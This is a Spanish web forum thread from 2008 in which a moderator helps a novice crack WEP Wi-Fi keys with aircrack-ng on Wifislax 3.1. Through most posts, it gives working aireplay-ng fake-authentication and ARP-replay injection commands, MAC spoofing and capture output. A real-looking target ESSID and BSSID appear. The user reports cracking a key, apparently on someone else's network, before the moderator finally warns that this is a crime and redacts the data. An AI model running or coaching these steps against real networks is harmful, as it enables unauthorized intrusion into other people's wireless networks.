Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
24-04-2014, 09:29 (Jueves)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Liberada version final de wifislax-4.8

+  Seguridad Wireless - Wifi
|-+  Suite Seguridad Wireless
| |-+  Entornos Virtuales (Moderador: drvalium)
| | |-+  Ataques y Asociaciones con Wifislax 3.1
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 Ir Abajo Imprimir
Autor Tema: Ataques y Asociaciones con Wifislax 3.1  (Leído 39041 veces)
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« : 07-03-2008, 08:30 (Viernes) »

Buenas...
drvalium he seguido paso a paso las instrucciones que vienen en la pagina http://foro.seguridadwireless.net/index.php/topic,4528.0.html pero en el paso 5 aplicando la asosiacion me sale este error...

"The interface MAC (00:00:00:00:00:00) doesn't the especified MAC (-h)"

que estoy haciendo mal  :'(

intente subier una imagen para que vieras exactamente que es lo que me pasa, pero no pude, si me pudieras decir como subo una para que la veas.... Nuevamente muchas GRACIAS   Huh






En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #1 : 07-03-2008, 22:16 (Viernes) »

Buenas

Cita de: M_aqui
"The interface MAC (00:00:00:00:00:00) doesn't the especified MAC (-h)"

Usa el codigo asi:

aireplay-ng -1 30 -e ESSID -a BSSID -h 11:22:33:44:55:66 wlan0

ESSID= nombre de la red a la que te quieres asociar.

BSSID= direccion MAC router de la red a la que te quieres asociar.

este ataque solo funciona si no hay cliente asociado.

Si hay cliente utiliza directamente el ataque 3.

aireplay-ng -3 -b BSSID -h STATION

BSSID= direccion MAC router de la red  que quieres monitorizar.

STATION: direccion MAC del cliente asociado.


Mira esto: Como saber si hay cliente asociado

Y para las subir las capturas esto: Manual subir fotos con Picasa

saludos

En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #2 : 08-03-2008, 03:46 (Sbado) »

Buenas...
Drvalium, segui al pie de la letra tu ultimo comentario, y lo unico que me faltaba era cambiar mi mac, pero investigando un poco logre hacerlo y despues de cambiarla, logre la asociacion sin ninugn problema y tambien logre que inyectara, bueno eso entre comillas, por eso mi nueva duda...
me aparece exactamente lo mismo que viene en la foto que esta en la pagina http://foro.seguridadwireless.net/index.php/topic,4528.0.html en el paso 6 empezando a inyectar paquetes pero miro la otra shell y nada, en la columa de "DATA" no hay un cambio, sigue normal como si no inyectara, dime que hago porfavor...

Me di cuenta de que por ejemplo en Backtrack 2 para poder inyectar y exprimirle jugo a la ALFA NETWORK hay que parchar el driver y el aircrack, no se si aqui lo tenga que hacer, espero me vuevas a ayudar... Gracias
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #3 : 08-03-2008, 03:53 (Sbado) »

buenas

con asociación falsa, puede llegar a tardar mucho rato en empezar a inyectar, ten paciencia.

saludos
En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #4 : 08-03-2008, 07:36 (Sbado) »

Buenas...
Cuando hago la asociacion y dejo la shell abierta despues de un rato me sale esto...
Attack was unsuccessful. Possible reasons:

wifislax ~ # aireplay-ng -1 30 -e 2WIRE654 -a 00:14:95:D9:78:21 -h 11:22:33:44:55:66 wlan0
06:28:15  Waiting for beacon frame (BSSID: 00:14:95:D9:78:21)
06:28:15  Sending Authentication Request
06:28:15  Authentication successful
06:28:15  Sending Association Request
06:28:15  Association successful :-)

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

Eso es normal o ocurrio un error?? o despues de que autentifica devo cerrar la shell???

cuando logro inyectar con una asociacion falsa cuanto es mucho rato?? no es porque sea desesperad, pero quiero darme una idea de lo que tenria que esperar para ver los resultados deseados... Gracias
En línea
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #5 : 08-03-2008, 08:52 (Sbado) »

Si quiero ir directamente al ataque 3 tengo primero que hacer la asociacion?? o voy directamente sin hacer la asociacion, lo he intentado de las dos formas y no puedo, me dice que no esta asociado... mas ayuda porfavor... Gracias
En línea
ChimoC
Memoria, dignidad y justicia
Colaborador
*
Desconectado Desconectado

Mensajes: 6226



Ver Perfil
« Respuesta #6 : 08-03-2008, 11:57 (Sbado) »

Buenas:

Este es un manual para instalación.... por favor para ataques y asociaciones y cosas por el estilo.... abre un nuevo post  Wink

Un saludo

ChimoC
En línea

Hemos puesto bozal al buscador del foro, ya no muerde, asi que USALO
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #7 : 08-03-2008, 16:40 (Sbado) »

Buenas...
Espero que en este tema contemos con los conocimientos de Drvalium, ChimoC y todos los que quieran aportar algo positivo para las personas que batallmos con linux...
En línea
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #8 : 08-03-2008, 17:39 (Sbado) »

Buenas...
drvalium como te decia en el otro post, lo vuelvo a poner aqui...
1.- Me pongo en modo monitor asi airmon-ng start wlan0 X   "X el numero del canal deseado"
2.- Checo que la tarjeta este en modo monito y en el canal deseado de esta forma iwconfig wlan0
3.- Corro el airodump asi airodump-ng -w aaaa -cX wlan0  "X el numero del canal deseado"
4.- Si no hay un cliente asociado hago esto:
     4.1.- aireplay-ng -1 30 -e ESSID -a BSSID -h 00:11:22:33:44:55 wlan0  y aqui empiezan mis dudas segun yo logro la asociacion porque me sale esto:

wifislax ~ # aireplay-ng -1 30 -e "NOMBRE BSSID" -a "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
16:00:05  Waiting for beacon frame (BSSID: 00:14:95:XX:XX:XX)
16:00:05  Sending Authentication Request
16:00:05  Authentication successful
16:00:05  Sending Association Request
16:00:05  Association successful :-)


pero dejo la shell abierta que no se si sea lo correcto y despues de un rato me sale esto:

16:02:51  Sending keep-alive packet
16:03:06  Sending Authentication Request
16:03:06  Authentication successful
16:03:06  Sending Association Request
16:03:11  Sending Authentication Request
16:03:11  Authentication successful
16:03:11  Sending Association Request
16:03:16  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).


es normal o deveria cerrar la shell desde que me dice que ya autentifico??

5.- Antes de que me salga la leyenda "Attack was unsuccessful. Possible reasons:" y todo lo demas que ya comente, Trato de Inyectar de esta forma
aireplay-ng -3 -x600 -b "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
y me sale esto:
Saving ARP requests in replay_arp-0308-160204.cap
You should also start airodump-ng to capture replies.
Read 292649 packets (got 3307 ARP requests), sent 668552 packets...(511 pps)


Pero no veo ningun cambio significativo, SI ESTOY INYECTANDO BIEN?? o no estoy inyectando??
me dice drvalium en un post anterior que como es asociacion falsa tarda mucho en inyectar, Cuanto es mucho?? media hora una hora o mas y lo pregunto no por desesperado sino para saber si estoy haciendo bien las cosas...

6.- Si hay un cliente asociado hago esto tal cual drvalim me lo habia dicho:
aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"

pero me topo con otro problema que es este:

wifislax ~ # aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"
No replay interface specified.
"aireplay-ng --help" for help.


y hasta aqui llego con un cliente asociado...
Espero no sea mucho pedir de mi parte y me puedan ayudar... de nuevo GRACIAS
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #9 : 09-03-2008, 00:56 (Domingo) »

buenas

Citar
es normal o deveria cerrar la shell desde que me dice que ya autentifico??

es normal

Citar
5.- Antes de que me salga la leyenda "Attack was unsuccessful. Possible reasons:" y todo lo demas que ya comente, Trato de Inyectar de esta forma
aireplay-ng -3 -x600 -b "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
y me sale esto:
Saving ARP requests in replay_arp-0308-160204.cap
You should also start airodump-ng to capture replies.
Read 292649 packets (got 3307 ARP requests), sent 668552 packets...(511 pps)

Pero no veo ningun cambio significativo, SI ESTOY INYECTANDO BIEN?? o no estoy inyectando??

esto te dice que a estas inyectando got 3307 ARP requests y deberías notar que los DATA suben mas deprisa.

Citar
me dice drvalium en un post anterior que como es asociacion falsa tarda mucho en inyectar, Cuanto es mucho?? media hora una hora o mas y lo pregunto no por desesperado sino para saber si estoy haciendo bien las cosas...

en verdad dije
buenas

con asociación falsa, puede llegar a tardar mucho rato en empezar a inyectar, ten paciencia.

saludos

pero también puede ser casi instantáneo.

Cita de: M-aqui
6.- Si hay un cliente asociado hago esto tal cual drvalim me lo habia dicho:
aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"

pero me topo con otro problema que es este:

wifislax ~ # aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"
No replay interface specified.
"aireplay-ng --help" for help.

Perdón el error a sido mio el comando correcto es:

aireplay-ng -3 -b BSSID -h STATION wlan0

saludos
En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #10 : 09-03-2008, 19:40 (Domingo) »

Buenas...
drvalium antes de seguir con mis dudas dejame darte las gracias, todos tus comentarios me han servido de mucho...

Como te dije en un post anterior cuando tengo un cliente y quiero ir directamente al ataque 3 no puedo, te describo paso a paso lo que hago y espero me puedas ayudar nuevamente...

1.- Corro el airmon-ng y me pongo en el canal deseado asi, airmon-ng start wlan0 "X"  ("X" canal deseado)
2.- Checo la tarjeta que este en modo monitor y en el canal deseado asi, iwconfig wlan0
3.- Corro el airodump-ng en el canal deseado asi, airdump-ng -w nombre del archivo -cX wlan0
4.- Aqui si no hubiera un cliente, haria la asociacion, pero como si tengo cliente NO HAGO ESTE PASO y me voy directame al ataque 3 y lo hago de esta forma, aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0

y es aqui donde ya no puedo avanzar despues de poner el comando anterior me sale esto:

wifislax ~ # aireplay-ng -3 -b 00:1A:C4:57:11:89 -h 00:12:F0:B6:0C:47 wlan0
The interface MAC (11:22:33:44:55:66) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:12:F0:B6:0C:47
Saving ARP requests in replay_arp-0309-112003.cap
You should also start airodump-ng to capture replies.
11:20:19  Packets per second adjusted to 375 894 packets...(74 pps)


a mi poco entender lo que esta en rojo esta mal y por eso no puedo inyectar cuando tengo un cliente...
Que hago, que estoy haciendo mal??  Undecided
Gracias
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #11 : 09-03-2008, 20:06 (Domingo) »

Buenas

Citar
The interface MAC (11:22:33:44:55:66) doesn't match the specified MAC (-h).

esa linea te dice que tu adaptador tiene configurado como MAC 11:22:33:44:55:66 y que no es la correcta, pero la siguiente

Citar
ifconfig wlan0 hw ether 00:12:F0:B6:0C:47

te informa de que la ha cambiado por la que corresponde.


Ambas lineas son normales, no te preocupes.

Ahora no puedo (estoy viendo las motos Wink),

para mañana te pondré unas bonitas fotos.

ya te lo he dicho, ten paciencia, si fuese tan fácil no existirían foros como este. Wink

saludos
En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #12 : 09-03-2008, 20:40 (Domingo) »

Buenas...
Entonces todo esta bien?? solamente hay que esperar o tengo que ponerle en el comando
aireplay-ng -3 -b BSSID DEL CLIENTE -h MI MAC FALSA wlan0
o
aireplay-ng -3 -b MAC DEL CLIENTE -h MI MAC FALSA wlan0
o
como tu me has dicho que seria de esta forma

aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0
y aunque salga el error que te comente anteriormente esta bien y solo hay que esperar???
Gracias por ayudarme
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #13 : 09-03-2008, 20:49 (Domingo) »

buenas

Citar
seria de esta forma

aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0
y aunque salga el error que te comente anteriormente esta bien y solo hay que esperar???
Gracias por ayudarme

exacto solo hay que esperar.

saludos
En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #14 : 10-03-2008, 07:28 (Lunes) »

Buenas...
Primero que nada gracias por todo el apoyo...
Les cuento que ya he obtenido resultados, he logrado desifrar una clave, lo hice mediante asociacion, tardo un poco mas de una hora y obtuve resultados...
He intentado hacerlo cuado hay un cliente y no he podido, he seguido todos los consejos de drvalium y he tenido pasciencia y nada, en mi ultimo intento con un cliente asociado tardo mas de 3 horas sin conseguir ningun resultado, de todas formas creo que para un novato como yo, el obtener la clave de una u otra forma creo que es bueno y seguire intentando para obtener los resultados deseado como lograr obtener una clave con cliente asociado y en poco tiempo... Espero seguir contando con su apoyo
En línea
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #15 : 12-03-2008, 01:49 (Mircoles) »

Buenas...
Drvalium como ya lo comente en post anterior, he conseguido resultados positivo, aunque sigo teniendo dudas acerca de la inyeccion, he tenido pasciecia como tu me lo has recomendado he llegado a estar esperando casi 10 horas y nada, pero ayer he conseguido resultados en aproximadamente 16 minutos que es lo que creo que todos buscamos "que sea rapido" mi pregunta es porque tanta diferencia en tiempo?? a que se deve?? estoy usando una ALFA NETWORK y he leido en algunas paginas que para usar esta tarjeta y obtener resultados rapidos por ejemplo en backtrack hay que parchar algunos archivo te dejo la pagina para que le heches un ojo  :o...
http://aircrack-ng.org/doku.php?id=r8187
En wifislax 3.1 hay que hacer algo similar??
espero no aburrirte con este tema y como siempre Gracias por todo el apoyo
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #16 : 13-03-2008, 01:31 (Jueves) »

Buenas

- Por supuesto que no me aburres, me martirizas Grin Grin Grin Grin Grin

Citar
mi pregunta es porque tanta diferencia en tiempo?? a que se deve??

- la verdad es que no tengo ni idea.

- Sin cliente asociado (ataques 1+3), digamos que no es una ciencia exacta, si usas el buscador del foro verás que se ha escrito mucho sobre el tema.

- Con cliente asociado (ataque 3) mas o menos siempre se tarda lo mismo, entre 3 y 20 minutos, depende de la velocidad con la que inyectes los paquetes y la velocidad de inyección depende entre otras cosas de la calidad de la señal. Prueba a cambiar la transmisión de datos (rate) del adaptador.

Código:
iwconfig wlan0 rate 1M
he puesto un mega pero puedes poner dos, tres, cinco, lo que quieras.

- También depende mucho del trafico que hay en la red, se captura mucho mas rápido de una red que esta usando el emule que de una red que están mirando el correo.

- Estoy tardando en contestarte por que tengo mi Bosslan prestada y hasta el viernes no la recupero, así que la tenga probaré los nuevos drivers y podre contestarte en condiciones.

- Para actualizar los drivers no es necesario que te vallas del foro, aquí y por cortesía de Hwagm los tienes instrucciones incluidas.

  Drivers rtl8187_linux_26.1010

- Como para actualizarlos necesitas conexión a internet en WifiSlax, quizá esto te interese.

  Compartir la conexión a Internet entre Windows y VMware

- También me acuerdo que te dije que te pondría unas capturas del proceso, cuando recupere la Bosslan cumpliré mi palabra. Wink

- De momento ya te digo que estoy sin Bosslan, así que te pido un poco de paciencia.


saludos


PD: "aburreme" siempre que quieras Wink





« Última modificación: 17-03-2008, 21:48 (Lunes) por drvalium » En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #17 : 14-03-2008, 04:20 (Viernes) »

Buenas...
Drvalium haciedo mas pruebas me he topado con otra duda...
hoy quise obtener una clave de una red que tiene por ESSID -=( XXXXXXX )=- y el problema viene cuando me quiero autentificar porque no hay cliente y me sale este error

Waiting for beacon frame (BSSID: 00:00:00:00:00:00)
Sending Authentication Request
Authentication successful
Sending Association Request
Denied (code 12), wrong ESSID or WPA?


Creo que no esta asociando sin embargo trato de inyectar ya que en el otro shell me pone en AUT  OPN que eso siempre sale cuando te logras asociar...  y al tratar de inyectar me dice esto...

aireplay-ng -1 30 -e -=( XXXXXXX )=- -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 wlan0
bash: syntax error near unexpected token '('


creo que no me puedo autentificar por el parentesis pero como le haria si asi es el nombre del ESSID??
« Última modificación: 14-03-2008, 04:38 (Viernes) por drvalium » En línea
M_aqui
**
Desconectado Desconectado

Mensajes: 26


Ver Perfil
« Respuesta #18 : 14-03-2008, 04:26 (Viernes) »

Se me olvidava...
Espero que publiques las fotos, y tambien espero que cheques los nuevos drivers y me digas si es necesario que en wifislax sean parchados o ya con los que trae la version 3.1 es suficiente...
Gracias
En línea
drvalium
Moderador
*
Desconectado Desconectado

Mensajes: 15588


Misantrópico


Ver Perfil
« Respuesta #19 : 14-03-2008, 04:42 (Viernes) »

Buenas

te recuerdo que la obtención de claves ajenas es un delito y en el foro no damos apoyo ha ese tipo de actividades. Ademas publicar datos ajenos creo que también es un delito.

he editado tu post para anular esos datos, por favor vigila que preguntas o me veré obligado a borrarlos.

De obligada lectura

reconfigura tu Router poniéndole el mismo ESSID que te da problemas y podré contestarte.

saludos
« Última modificación: 14-03-2008, 04:52 (Viernes) por drvalium » En línea

Cambio Pitbull por mano ortopédica.

ME HE IDO DE VACACIONES, SI ESPERABAS ALGUNA RESPUESTA POR MI PARTE TE PIDO DISCULPAS, VOY A ESTAR DESAPARECIDO UNOS CUANTOS DÍAS.
Páginas: [1] 2 3 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines